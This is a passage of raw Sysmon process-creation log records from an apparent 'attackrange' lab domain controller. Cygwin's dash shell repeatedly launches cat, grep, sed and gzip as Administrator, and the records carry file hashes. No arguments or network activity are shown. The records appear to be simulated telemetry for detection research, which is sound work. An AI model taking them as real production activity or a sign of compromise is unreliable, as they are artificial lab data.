14:55:56.565{A8622C2F-53FC-6078-CA09-00000000AE01}1612C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050586Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.557{A8622C2F-53FC-6078-C909-00000000AE01}2112C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FC-6078-C809-00000000AE01}6416C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050576Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.550{A8622C2F-53FC-6078-C809-00000000AE01}6416C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050564Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.542{A8622C2F-53FC-6078-C709-00000000AE01}612C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FC-6078-C509-00000000AE01}5084C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050546Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.535{A8622C2F-53FC-6078-C609-00000000AE01}4288C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FC-6078-C309-00000000AE01}6032C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050544Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.534{A8622C2F-53FC-6078-C509-00000000AE01}5084C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050525Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.527{A8622C2F-53FC-6078-C409-00000000AE01}3136C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FC-6078-C209-00000000AE01}3208C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050524Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.527{A8622C2F-53FC-6078-C309-00000000AE01}6032C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050512Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.520{A8622C2F-53FC-6078-C209-00000000AE01}3208C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050500Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.513{A8622C2F-53FC-6078-C109-00000000AE01}616C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FC-6078-C009-00000000AE01}6364C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050490Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.506{A8622C2F-53FC-6078-C009-00000000AE01}6364C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050478Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.497{A8622C2F-53FC-6078-BF09-00000000AE01}2952C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FC-6078-BD09-00000000AE01}4832C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050460Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.490{A8622C2F-53FC-6078-BE09-00000000AE01}6652C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FC-6078-BB09-00000000AE01}4336C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050458Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.489{A8622C2F-53FC-6078-BD09-00000000AE01}4832C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050439Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.483{A8622C2F-53FC-6078-BC09-00000000AE01}3200C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FC-6078-BA09-00000000AE01}4056C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050438Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.482{A8622C2F-53FC-6078-BB09-00000000AE01}4336C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050426Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.476{A8622C2F-53FC-6078-BA09-00000000AE01}4056C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050414Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.468{A8622C2F-53FC-6078-B909-00000000AE01}5516C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FC-6078-B809-00000000AE01}6580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050403Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.461{A8622C2F-53FC-6078-B809-00000000AE01}6580C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050391Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.452{A8622C2F-53FC-6078-B709-00000000AE01}7016C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FC-6078-B509-00000000AE01}7140C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050373Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.445{A8622C2F-53FC-6078-B609-00000000AE01}2112C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FC-6078-B309-00000000AE01}4300C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050371Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.445{A8622C2F-53FC-6078-B509-00000000AE01}7140C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050352Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.438{A8622C2F-53FC-6078-B409-00000000AE01}612C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FC-6078-B209-00000000AE01}5628C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050351Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.438{A8622C2F-53FC-6078-B309-00000000AE01}4300C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050339Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.431{A8622C2F-53FC-6078-B209-00000000AE01}5628C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050327Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.423{A8622C2F-53FC-6078-B109-00000000AE01}1392C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FC-6078-B009-00000000AE01}5116C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050317Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.416{A8622C2F-53FC-6078-B009-00000000AE01}5116C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050305Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.408{A8622C2F-53FC-6078-AF09-00000000AE01}6968C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FC-6078-AD09-00000000AE01}5852C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050287Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.400{A8622C2F-53FC-6078-AE09-00000000AE01}616C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FC-6078-AB09-00000000AE01}1348C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050285Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.400{A8622C2F-53FC-6078-AD09-00000000AE01}5852C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050266Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.393{A8622C2F-53FC-6078-AC09-00000000AE01}2952C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FC-6078-AA09-00000000AE01}6448C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050265Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.393{A8622C2F-53FC-6078-AB09-00000000AE01}1348C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050253Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.386{A8622C2F-53FC-6078-AA09-00000000AE01}6448C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050241Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.378{A8622C2F-53FC-6078-A909-00000000AE01}1156C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FC-6078-A809-00000000AE01}6592C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050231Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.371{A8622C2F-53FC-6078-A809-00000000AE01}6592C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050219Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.363{A8622C2F-53FC-6078-A709-00000000AE01}5396C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FC-6078-A509-00000000AE01}4056C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050201Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.355{A8622C2F-53FC-6078-A609-00000000AE01}6748C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FC-6078-A309-00000000AE01}924C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050199Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.355{A8622C2F-53FC-6078-A509-00000000AE01}4056C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050180Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.348{A8622C2F-53FC-6078-A309-00000000AE01}924C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050179Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.348{A8622C2F-53FC-6078-A409-00000000AE01}6336C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FC-6078-A209-00000000AE01}7016C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050167Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.341{A8622C2F-53FC-6078-A209-00000000AE01}7016C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050155Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.333{A8622C2F-53FC-6078-A109-00000000AE01}4288C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FC-6078-A009-00000000AE01}5800C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050145Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 